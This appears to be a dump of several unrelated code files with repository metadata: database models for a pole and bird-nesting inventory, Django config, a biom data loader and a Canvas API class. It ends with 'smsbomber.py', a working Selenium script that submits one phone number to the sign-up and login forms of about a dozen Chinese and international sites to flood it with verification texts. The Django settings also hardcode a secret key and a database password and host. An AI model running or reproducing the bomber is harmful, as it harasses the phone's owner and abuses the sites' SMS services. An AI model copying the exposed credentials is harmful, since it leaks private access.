Column('nb_poteaux_equipes_risque_faible', BigInteger),
Column('m_troncons_inventories', Float(53)),
Column('m_troncons_inventories_risque_fort', Float(53)),
Column('m_troncons_inventories_risque_secondaire', Float(53)),
Column('m_troncons_inventories_risque_faible', Float(53)),
Column('m_troncons_equipes', Float(53)),
Column('m_troncons_equipes_risque_fort', Float(53)),
Column('m_troncons_equipes_risque_secondaire', Float(53)),
Column('m_troncons_equipes_risque_faible', Float(53)),
Column('geom', Text)
)
class TVZonesSensibles(object):
pass
mapper(TVZonesSensibles, t_v_zones_sensibles)
class TInventairePoteauxErdf(Base):
__tablename__ = 't_inventaire_poteaux_erdf'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326'),
Index('t_inventaire_poteaux_erdf_index_id', 'id_type_poteau_erdf', 'id_type_poteau_erdf_secondaire', 'id_zone_sensible', 'id_attractivite', 'id_dangerosite')
)
id_inventaire_poteau_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_inventaire_poteaux_erdf_id_inventaire_poteau_erdf_seq'::regclass)"))
date_inventaire = Column(Date)
id_type_poteau_erdf = Column(ForeignKey(u'dico_type_poteau_erdf.id_type_poteau_erdf'))
id_type_poteau_erdf_secondaire = Column(ForeignKey(u'dico_type_poteau_erdf.id_type_poteau_erdf'))
remarques = Column(String)
id_zone_sensible = Column(ForeignKey(u't_zones_sensibles.id_zone_sensible'))
etat_poteau = Column(String)
id_attractivite = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
id_dangerosite = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
neutralisation_prevue_isolation = Column(Boolean)
neutralisation_prevue_dissuasion = Column(Boolean)
neutralisation_prevue_attraction = Column(Boolean)
deja_neutralise = Column(Boolean)
geom = Column(NullType, index=True)
geom_json = Column(String)
risque_poteau = Column(Unicode(20))
commune = Column(String(100))
nb_equipements = Column(Integer)
nb_photos = Column(Integer)
insee = Column(ForeignKey(u't_communes.insee'))
dico_classes_risque = relationship(u'DicoClassesRisque', primaryjoin='TInventairePoteauxErdf.id_attractivite == DicoClassesRisque.id_classe_risque')
dico_classes_risque1 = relationship(u'DicoClassesRisque', primaryjoin='TInventairePoteauxErdf.id_dangerosite == DicoClassesRisque.id_classe_risque')
dico_type_poteau_erdf = relationship(u'DicoTypePoteauErdf', primaryjoin='TInventairePoteauxErdf.id_type_poteau_erdf == DicoTypePoteauErdf.id_type_poteau_erdf')
dico_type_poteau_erdf1 = relationship(u'DicoTypePoteauErdf', primaryjoin='TInventairePoteauxErdf.id_type_poteau_erdf_secondaire == DicoTypePoteauErdf.id_type_poteau_erdf')
t_zones_sensible = relationship(u'TZonesSensible', backref='poteaux')
t_commune = relationship(u'TCommune', backref='poteaux')
class TInventaireTronconsErdf(Base):
__tablename__ = 't_inventaire_troncons_erdf'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326'),
Index('t_inventaire_troncons_erdf_index_id', 'id_zone_sensible', 'id_risque_deplacement', 'id_risque_integration_topo', 'id_risque_integration_vegetation', 'id_risque_integration_bati')
)
id_inventaire_troncon_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_inventaire_troncons_erdf_id_inventaire_troncon_erdf_seq'::regclass)"))
date_inventaire = Column(Date)
id_zone_sensible = Column(ForeignKey(u't_zones_sensibles.id_zone_sensible'))
geom = Column(NullType, index=True)
remarques = Column(String)
id_risque_deplacement = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
id_risque_integration_topo = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
id_risque_integration_vegetation = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
id_risque_integration_bati = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
deja_neutralise = Column(Boolean)
geom_json = Column(String)
risque_troncon = Column(String(20))
commune = Column(String(100))
nb_photos = Column(Integer)
lg_equipee = Column(Float(53))
longueur = Column(Float(53))
insee = Column(ForeignKey(u't_communes.insee'))
dico_classes_risque = relationship(u'DicoClassesRisque', primaryjoin='TInventaireTronconsErdf.id_risque_deplacement == DicoClassesRisque.id_classe_risque')
dico_classes_risque1 = relationship(u'DicoClassesRisque', primaryjoin='TInventaireTronconsErdf.id_risque_integration_bati == DicoClassesRisque.id_classe_risque')
dico_classes_risque2 = relationship(u'DicoClassesRisque', primaryjoin='TInventaireTronconsErdf.id_risque_integration_topo == DicoClassesRisque.id_classe_risque')
dico_classes_risque3 = relationship(u'DicoClassesRisque', primaryjoin='TInventaireTronconsErdf.id_risque_integration_vegetation == DicoClassesRisque.id_classe_risque')
t_zones_sensible = relationship(u'TZonesSensible')
t_commune = relationship(u'TCommune', backref='troncons')
class TObservation(Base):
__tablename__ = 't_observations'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2')
)
id_observation = Column(Integer, primary_key=True, server_default=text("nextval('t_observations_id_observation_seq'::regclass)"))
id_espece = Column(ForeignKey(u't_especes.id_espece', ondelete=u'CASCADE', onupdate=u'CASCADE'), nullable=False)
lieu = Column(String(100))
commentaires = Column(String)
precision_loc = Column(String(50))
source = Column(String(50))
geom = Column(NullType, index=True)
geom_json = Column(String)
nombre = Column(Integer)
date = Column(Date)
t_espece = relationship(u'TEspece')
class TPhotosPoteauxErdf(Base):
__tablename__ = 't_photos_poteaux_erdf'
id_photo_poteau_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_photos_poteaux_erdf_id_photo_poteau_erdf_seq'::regclass)"))
id_inventaire_poteau_erdf = Column(ForeignKey(u't_inventaire_poteaux_erdf.id_inventaire_poteau_erdf', ondelete=u'CASCADE', onupdate=u'CASCADE'))
chemin_photo = Column(String)
commentaire = Column(String)
neutralise = Column(Boolean)
auteur = Column(String)
t_inventaire_poteaux_erdf = relationship(u'TInventairePoteauxErdf')
class TPhotosTronconsErdf(Base):
__tablename__ = 't_photos_troncons_erdf'
id_photo_troncon_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_photos_troncons_erdf_id_photo_troncon_erdf_seq'::regclass)"))
id_inventaire_troncon_erdf = Column(ForeignKey(u't_inventaire_troncons_erdf.id_inventaire_troncon_erdf', ondelete=u'CASCADE', onupdate=u'CASCADE'))
chemin_photo = Column(String)
commentaire = Column(String)
neutralise = Column(Boolean)
auteur = Column(String)
t_inventaire_troncons_erdf = relationship(u'TInventaireTronconsErdf')
class TSitesNidification(Base):
__tablename__ = 't_sites_nidification'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_site_nidification = Column(Integer, primary_key=True, server_default=text("nextval('t_sites_nidification_id_site_nidification_seq'::regclass)"))
id_espece = Column(ForeignKey(u't_especes.id_espece', ondelete=u'CASCADE', onupdate=u'CASCADE'), nullable=False)
lieu = Column(String(100))
nidification_10_ans = Column(Boolean)
commentaires = Column(String)
precision_loc = Column(String(50))
source = Column(String(50))
geom = Column(NullType, index=True)
geom_json = Column(String)
t_espece = relationship(u'TEspece')
class TZonesSensible(Base):
__tablename__ = 't_zones_sensibles'
id_zone_sensible = Column(Integer, primary_key=True, server_default=text("nextval('t_zone_sensible_id_zone_sensible_seq'::regclass)"))
nom_zone_sensible = Column(String)
niveau_sensibilite = Column(Integer)
t_v_equipements_poteaux = Table(
'v_equipements_poteaux', metadata,
Column('id', Integer, primary_key=True),
Column('id_inventaire_poteau_erdf', Integer),
Column('nom_type_equipement_poteau', String),
Column('id_nb_equipements', Integer),
Column('mis_en_place', Boolean),
Column('date_equipement', Date),
Column('geom_json', String)
)
class TVEquipementsPoteaux(object):
pass
mapper(TVEquipementsPoteaux, t_v_equipements_poteaux)
t_v_sites_nidification_zone_tampon = Table(
'v_sites_nidification_zone_tampon', metadata,
Column('id_espece', Integer),
Column('nom_espece', String(100)),
Column('geom', NullType),
Column('geom_json', Text)
)
t_v_zones_sensibles_poteaux = Table(
'v_zones_sensibles_poteaux', metadata,
Column('id_zone_sensible', Integer),
Column('nb_poteaux_inventories', BigInteger),
Column('nb_poteaux_inventories_risque_fort', BigInteger),
Column('nb_poteaux_inventories_risque_secondaire', BigInteger),
Column('nb_poteaux_inventories_risque_faible', BigInteger),
Column('nb_poteaux_equipes', BigInteger),
Column('nb_poteaux_equipes_risque_fort', BigInteger),
Column('nb_poteaux_equipes_risque_secondaire', BigInteger),
Column('nb_poteaux_equipes_risque_faible', BigInteger),
Column('geom', NullType)
)
t_v_zones_sensibles_troncons = Table(
'v_zones_sensibles_troncons', metadata,
Column('id_zone_sensible', Integer),
Column('m_troncons_inventories', Float(53)),
Column('m_troncons_inventories_risque_fort', Float(53)),
Column('m_troncons_inventories_risque_secondaire', Float(53)),
Column('m_troncons_inventories_risque_faible', Float(53)),
Column('m_troncons_equipes', Float(53)),
Column('m_troncons_equipes_risque_fort', Float(53)),
Column('m_troncons_equipes_risque_secondaire', Float(53)),
Column('m_troncons_equipes_risque_faible', Float(53)),
Column('geom', NullType)
)
|
[
"[email protected]"
] | |
6e0ae3e9c859c2ff133011147002083abb1e1ecf
|
6dfb7fe44b6c5bfb7feb5a101656e3d3402a621f
|
/simp_py_examples/course/S1800/t105.py
|
14b64f55e86d1ce9d76af5b273b6ada48bd93378
|
[
"MIT"
] |
permissive
|
kcfkwok2003/Simp_py
|
11d6813fac83ab6309eb8efc22fcd8edde5b19b8
|
f75e66da01b45dc8688dda602f8b33d4258f0c31
|
refs/heads/master
| 2021-05-11T00:36:36.872754 | 2018-12-19T01:41:15 | 2018-12-19T01:41:15 | 118,306,332 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 149 |
py
|
from simp_py import tft
lcd = tft.tft
lcd.clear()
import time
cnt=10
while cnt >=0:
lcd.text(10,10, 'count: %s ' % cnt)
cnt -=1
time.sleep(1)
|
[
"[email protected]"
] | |
d02fb0c15d67504305264787a3321d77fe9822f8
|
068ac6386ff76431e308b7d7b69d8f8c8ae4f724
|
/jmj/wsgi.py
|
bccbd5fdc6024710a40b741290eb0bce529d8b94
|
[] |
no_license
|
Cesarcalles1/proyecto
|
67cf0a618e34c728bcf51ec54015170446997ba4
|
6417126c57ace7854b25ad5a042e8080bbd52f82
|
refs/heads/master
| 2021-05-04T05:30:38.363080 | 2018-02-05T16:58:47 | 2018-02-05T16:58:47 | 120,339,693 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 383 |
py
|
"""
WSGI config for jmj project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "jmj.settings")
application = get_wsgi_application()
|
[
"[email protected]"
] | |
bfc47b482deb0ccf1f3e645d49665369758987ff
|
3a3e823f6b94b7eae8a363b0b51b036d2b0a1669
|
/metvae/dataset/biom.py
|
aa3196a0a38243f360389493a4983f3f36972811
|
[] |
no_license
|
mortonjt/metvae
|
8a28bbbd72ee79d66992bd31bd82af65b83ea819
|
f2f241fdedd2f4c045a088727df1f155b9ce9a20
|
refs/heads/main
| 2022-12-31T16:24:26.014394 | 2020-10-20T23:38:50 | 2020-10-20T23:38:50 | 305,812,115 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,780 |
py
|
import os
import re
import biom
import math
import logging
import numpy as np
import pandas as pd
import torch
from torch.utils.data import Dataset
from typing import List
logger = logging.getLogger(__name__)
class BiomDataset(Dataset):
"""Loads a `.biom` file.
Parameters
----------
filename : Path
Filepath to biom table
metadata_file : Path
Filepath to sample metadata
batch_category : str
Column name forr batch indices
"""
def __init__(
self,
table: biom.Table,
metadata: pd.DataFrame = None,
batch_category: str = None,
):
super(BiomDataset).__init__()
self.table = table
self.metadata = metadata
self.batch_category = batch_category
self.populate()
def populate(self):
logger.info("Preprocessing dataset")
if self.metadata is not None:
# match the metadata with the table
ids = set(self.table.ids()) & set(self.metadata.index)
filter_f = lambda v, i, m: i in ids
self.table = self.table.filter(filter_f, axis='sample')
self.metadata = self.metadata.loc[self.table.ids()]
if self.metadata.index.name is None:
raise ValueError('`Index` must have a name either'
'`sampleid`, `sample-id` or #SampleID')
self.index_name = self.metadata.index.name
self.metadata = self.metadata.reset_index()
self.batch_indices = None
if self.batch_category is not None and self.metadata is not None:
batch_cats = np.unique(self.metadata[self.batch_category].values)
batch_cats = pd.Series(
np.arange(len(batch_cats)), index=batch_cats)
self.batch_indices = np.array(
list(map(lambda x: batch_cats.loc[x],
self.metadata[self.batch_category].values)))
logger.info("Finished preprocessing dataset")
def __len__(self) -> int:
return len(self.table.ids())
def __getitem__(self, i):
""" Returns all of the samples for a given subject
Returns
-------
counts : np.array
OTU counts for specified samples.
batch_indices : np.array
Membership ids for batch samples. If not specified, return None.
"""
sample_idx = self.table.ids()[i]
if self.batch_indices is not None:
batch_indices = self.batch_indices[i]
else:
batch_indices = None
counts = self.table.data(id=sample_idx, axis='sample')
return counts, batch_indices
def __iter__(self):
worker_info = torch.utils.data.get_worker_info()
start = 0
end = self.__len__()
if worker_info is None: # single-process data loading
for i in range(end):
yield self.__getitem__(i)
else:
worker_id = worker_info.id
w = float(worker_info.num_workers)
t = (end - start)
w = float(worker_info.num_workers)
per_worker = int(math.ceil(t / w))
worker_id = worker_info.id
iter_start = start + worker_id * per_worker
iter_end = min(iter_start + per_worker, end)
for i in range(iter_start, iter_end):
yield self.__getitem__(i)
class BiomBatchDataset(BiomDataset):
"""Loads a `.biom` file.
Parameters
----------
filename : Path
Filepath to biom table
metadata_file : Path
Filepath to sample metadata
batch_differentials : str
Pre-trained batch differentials effects
batch_category : str
Column name in metadata for batch indices
Notes
-----
Important, periods cannot be handled in the labels
in the batch_category. Make sure that these are converted to
hyphens or underscores.
"""
def __init__(
self,
table: biom.Table,
metadata: pd.DataFrame,
batch_differentials : pd.DataFrame,
batch_category: str,
format_columns=True,
):
super(BiomBatchDataset).__init__()
self.table = table
self.metadata = metadata
self.batch_category = batch_category
self.batch_differentials = batch_differentials
self.format_columns = format_columns
self.populate()
def populate(self):
logger.info("Preprocessing dataset")
# Match the metadata with the table
ids = set(self.table.ids()) & set(self.metadata.index)
filter_f = lambda v, i, m: i in ids
self.table = self.table.filter(filter_f, axis='sample')
self.metadata = self.metadata.loc[self.table.ids()]
if self.metadata.index.name is None:
raise ValueError('`Index` must have a name either'
'`sampleid`, `sample-id` or #SampleID')
self.index_name = self.metadata.index.name
self.metadata = self.metadata.reset_index()
# Clean up the batch indexes
if self.format_columns:
if (self.metadata[self.batch_category].dtypes == np.float64 or
self.metadata[self.batch_category].dtypes == np.int64):
# format the batch category column
m = self.metadata[self.batch_category].astype(np.int64)
self.metadata[self.batch_category] = m.astype(np.str)
cols = self.batch_differentials.columns
def regex_f(x):
return re.findall(r"\[([A-Za-z0-9_]+).*\]", x)[0]
cols = list(map(regex_f, cols))
print('columns', cols)
self.batch_differentials.columns = cols
# Retrieve batch labels
batch_cats = np.unique(self.metadata[self.batch_category].values)
batch_cats = pd.Series(
np.arange(len(batch_cats)), index=batch_cats)
self.batch_indices = np.array(
list(map(lambda x: batch_cats.loc[x],
self.metadata[self.batch_category].values)))
# Clean up batch differentials
table_features = set(self.table.ids(axis='observation'))
batch_features = set(self.batch_differentials.index)
ids = table_features & batch_features
filter_f = lambda v, i, m: i in ids
self.table = self.table.filter(filter_f, axis='observation')
table_obs = self.table.ids(axis='observation')
self.batch_differentials = self.batch_differentials.loc[table_obs]
logger.info("Finished preprocessing dataset")
def __getitem__(self, i):
""" Returns all of the samples for a given subject.
Returns
-------
counts : np.array
OTU counts for specified samples.
batch_indices : np.array
Membership ids for batch samples.
"""
sample_idx = self.table.ids()[i]
batch_index = self.batch_indices[i]
counts = self.table.data(id=sample_idx, axis='sample')
batch_diffs = self.batch_differentials
assert batch_index < batch_diffs.shape[1], f'Batch diffs " {batch_diffs.shape[1]} > index : {batch_index}'
batch_diffs = np.array(batch_diffs.iloc[:, batch_index].values)
return counts, batch_diffs
def collate_single_f(batch):
counts_list = np.vstack([b[0] for b in batch])
counts = torch.from_numpy(counts_list).float()
return counts
def collate_batch_f(batch):
counts_list = np.vstack([b[0] for b in batch])
batch_diffs = np.vstack([b[1] for b in batch])
counts = torch.from_numpy(counts_list).float()
batch_diffs = torch.from_numpy(batch_diffs).float()
return counts, batch_diffs
|
[
"[email protected]"
] | |
a5da3fc38c2b91b2122f0fd2cb7e5d2e1f764ad9
|
9dc3ae479c1b5c6941681917151fcb0379f9173d
|
/CanvasFeatureFlag.py
|
7a8e37d3b28a61f52fb91ba58b6f1eb53cf1381a
|
[] |
no_license
|
cthacker-udel/Python-Canvas-API-Wrapper
|
bf2400b42b644791f45bbda7ed42e2c03a8d97b2
|
0263c591a2b02197529559346558b9be02f592c3
|
refs/heads/master
| 2023-08-25T12:01:48.417204 | 2021-10-09T10:49:51 | 2021-10-09T10:49:51 | 388,362,237 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 575 |
py
|
from CanvasClient import CanvasClient
class CanvasFeatureFlags(CanvasClient):
def __init__(self):
self.course_id = None
self.account_id = None
self.user_id = None
self.feature_id = None
self.state = None
def generate_queries(self):
body = {}
if self.state is not None:
body['state'] = self.state
return body
def clear_queries(self):
self.course_id = None
self.account_id = None
self.user_id = None
self.feature_id = None
self.state = None
|
[
"[email protected]"
] | |
c946ebf65e15dab1f0d9b98fff4d00ee381324a6
|
2dfc7642e778390b89a40413dbb64f2930b50ceb
|
/class5-functions_and_loops/problem.py
|
496ee84f08f5e1947c5bf45dcafd79373b57a2b6
|
[] |
no_license
|
tsui-david/tzu-chi-cs-class
|
dc740d50fcbdec91ab2be57fa41ebf4bdbc211c2
|
b75b567719ad03d46a42bdc671cad26f6f28e777
|
refs/heads/main
| 2023-03-20T11:37:24.989996 | 2021-03-07T16:20:05 | 2021-03-07T16:20:05 | 307,110,975 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 777 |
py
|
"""
Last week we created a program that accepts user input for number
and checks for:
(1) If number is odd, print out "odd"
(2) If number is even, print out "even"
"""
input_num = int(input('Input a number: '))
if input_num % 2 == 0:
print("even")
else:
print("odd")
"""
This week I want you to keep asking the user for numbers and print out even/odd until the user types in "stop"
Todo this I would like the following requirements:
- [ ] Until the user types in "stop" do not exit the code (hint: what allows us to do things over and over again?)
- [ ] Organize the even/odd logic into a function called "getEvenOdd"
- [ ] getEvenOdd will return the string "even" if the argument is even and "odd" if the argument is "odd"
- [ ] use getEvenOdd in your program
"""
|
[
"[email protected]"
] | |
35a7b100287d182cc18bd381c35f0962b21d2a4c
|
481f1f66071fc9b9eb8ea88e4df4e5186d99cdab
|
/cs540_project/settings.py
|
ed9c788dfa04191afa583308024095f3d3d778dc
|
[] |
no_license
|
tso2381637/cs540_project
|
3cc1cee12095377c16046f666a4ab077bcf08508
|
1803d0ce87465032c8921bec64f0e0dd82c82cd4
|
refs/heads/master
| 2021-02-11T17:44:48.363496 | 2020-03-13T04:31:10 | 2020-03-13T04:31:10 | 244,514,913 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,390 |
py
|
"""
Django settings for cs540_project project.
Generated by 'django-admin startproject' using Django 2.2.10.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')4@vhi%0rq(h@=uwzwb1y&@am=kob=))kvat5xqqw9l0jne(##'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'home.apps.HomeConfig',
'rest_framework',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cs540_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cs540_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'crash_data',
'USER': 'eason',
'PASSWORD': 'pa55word',
'HOST': '34.83.53.44', # Or an IP Address that your DB is hosted on
'PORT': '3306',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
DATETIME_FORMAT = '%m/%d/%Y %I:%M'
|
[
"[email protected]"
] | |
f067595b20bc57e3ed96ec100e0903721aaeea6c
|
1e2f1acfee7b707a6cc7cfe0ef48655b2a89fd11
|
/smsbomber.py
|
eef5d18d6c83cb56dad509c85d5c02dd9d39be14
|
[] |
no_license
|
bumzy/smsbomber
|
4431a07188c78bec7c296dadf37910cbe7e57ae8
|
d0c52d7d72b63caf580a505fed359da85dcdc8e4
|
refs/heads/master
| 2021-06-11T07:11:44.841964 | 2019-06-23T05:00:34 | 2019-06-23T05:00:34 | 193,308,016 | 0 | 0 | null | 2021-06-01T23:50:51 | 2019-06-23T04:57:24 |
Python
|
UTF-8
|
Python
| false | false | 17,432 |
py
|
# encoding=utf8
import time
from selenium import webdriver
class Bomber(object):
def __init__(self, phone):
self.phone = phone
self.options = webdriver.FirefoxOptions()
self.options.add_argument('--headless') # 后台模式
# 百度
def func0(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.baidu.com/')
browser.find_element_by_xpath('//*[@id="u1"]/a[7]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__footerULoginBtn"]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsSwitchWrapper"]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsPhone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsTimer"]').click()
browser.quit()
# 1号店
def func1(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.yhd.com/passport/register_input.do')
browser.find_element_by_xpath('//*[@id="userName"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click()
browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click()
browser.quit()
# 中国移动
def func2(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://login.10086.cn/login.html')
browser.find_element_by_xpath('//*[@id="sms_login_1"]').click()
browser.find_element_by_xpath('//*[@id="sms_name"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="getSMSPwd1"]').click()
browser.quit()
# 51book
def func3(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://caigou.51book.com/caigou/manage/designatedRegistryNewSignon.in')
browser.find_element_by_xpath('//*[@id="cg_06"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendMSgBtu"]').click()
browser.quit()
# 世界邦
def func4(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.shijiebang.com/reg/')
browser.find_element_by_xpath('/html/body/div[1]/div/div[3]/div/ul[1]/li[1]/a').click()
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/div/label[2]/input').click()
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[1]/td/div/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[2]/td/div/button').click()
browser.quit()
# 优酷
def func5(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://account.youku.com/register.htm')
browser.find_element_by_xpath('//*[@id="passport"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="password"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="repeatPsd"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="getMobileCode"]').click()
browser.quit()
# 亚马逊
def func6(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.amazon.cn/ap/register?_encoding=UTF8&openid.assoc_handle=cnflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.cn%2Fgp%2Fyourstore%2Fhome%3Fie%3DUTF8%26ref_%3Dnav_custrec_newcust')
# browser.find_element_by_xpath('//*[@id="nav-flyout-ya-newCust"]/a').click()
browser.find_element_by_xpath('//*[@id="ap_customer_name"]').send_keys('Mike998')
browser.find_element_by_xpath('//*[@id="ap_phone_number"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="ap_password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="ap_register_form"]/div/div/div[5]/div/label/input').click()
browser.find_element_by_xpath('//*[@id="continue"]').click()
browser.quit()
# 私否
def func7(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://segmentfault.com/')
browser.find_element_by_xpath('/html/body/div[2]/nav/div[2]/div[2]/ul/li/a[1]').click()
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[4]/a').click()
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[2]/div[1]/span/button').click()
browser.quit()
# 中瑞财富
def func8(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.zrcaifu.com/register')
browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').click()
browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').click()
browser.find_element_by_xpath('//*[@id="register-ul"]/li[3]/input').send_keys('pwd123456')
time.sleep(1)
browser.find_element_by_xpath('//*[@id="sendsms-for-regiter"]').click()
browser.quit()
# 97格格
def func9(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.97gg.net/Account/Register')
browser.find_element_by_xpath('//*[@id="phoneRegistTab"]/tab').click()
browser.find_element_by_xpath('//*[@id="UserName"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="Password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="ConfirmPassword"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="chkCodeSendBtn"]').click()
browser.quit()
# 千米
def func10(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.1000.com/reg?us=3W-head')
browser.find_element_by_xpath('//*[@id="react-content"]/div/div/div/div[2]/form/div[2]/div[2]/div/div/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="send_code"]').click()
browser.quit()
# 唯品会
def func11(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.vip.com/register')
browser.find_element_by_xpath('//*[@id="J_mobile_name"]').send_keys(self.phone)
